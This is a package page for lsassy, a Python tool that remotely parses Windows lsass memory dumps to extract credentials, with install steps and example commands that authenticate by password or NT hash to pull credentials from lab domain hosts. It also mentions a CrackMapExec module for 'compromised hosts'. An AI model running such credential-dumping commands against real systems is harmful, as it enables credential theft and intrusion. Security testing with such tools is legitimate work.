Python library to parse remote lsass dumps
Project description
lsassy
Python library to remotely parse lsass dump and extract credentials. This library uses impacket projects to remotely read necessary bytes in lsass dump and pypykatz to extract credentials.
Requirements
Basic Usage
lsassy [<domain>/]<user>[:<password>]@<target>:/share_name/path/to/lsass.dmp [--hashes [LM:]NT]
CrackMapExec module
I wrote a CrackMapExec module that uses lsassy to extract credentials on compromised hosts
CrackMapExec module is in cme
folder : CME Module
Examples
lsassy
lsassy ADSEC.LOCAL/jsnow:Winter_is_coming_\!@dc01.adsec.local:/C$/Windows/Temp/lsass.dmp
lsassy Administrateur:952c28bd2fd728898411b301475009b7@desktop01.adsec.local:/ADMIN$/lsass.dmp
CME Module
Installing
From pip
python3.7 -m pip install lsassy
From sources
python3.7 setup.py install
Acknowledgments
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
lsassy-0.1.1.tar.gz
(5.0 kB
view hashes)
Built Distribution
lsassy-0.1.1-py3-none-any.whl
(7.3 kB
view hashes)